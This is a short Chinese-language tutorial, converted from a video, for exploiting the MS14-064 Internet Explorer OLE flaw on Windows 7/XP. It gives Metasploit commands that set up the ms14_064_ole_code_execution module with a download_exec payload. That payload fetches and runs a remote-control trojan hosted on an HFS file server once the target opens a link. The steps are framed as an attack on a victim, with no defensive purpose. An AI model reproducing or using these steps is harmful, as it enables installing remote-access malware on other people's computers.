ms14_064漏洞别IE打开链接执行远控木马
漏洞危及版本:win7/ xp
原文地址:http://wobushi.cn/ 本人是将视频教程转换成了文字教程
1生成远控小马详见“ngrok配合msf生成木马”
2.将木马上传至hsf文件服务器复制链接
3.打开metasploit
root@kali:~#msfconsole
msf> useexploit/windows/browser/ms14_064_ole_code_execution
msfexploit(ms14_064_ole_code_execution) > set AllowPowershellPrompttrue
msfexploit(ms14_064_ole_code_execution) > set SRVHOST (本机ip)
msfexploit(ms14_064_ole_code_execution) > set payloadwindows/download_exec
msfexploit(ms14_064_ole_code_execution) > set URL (hsf文件服务器木马URL)
msf exploit(ms14_064_ole_code_execution)> exploit
4.复制msf生成的URL在目标中打开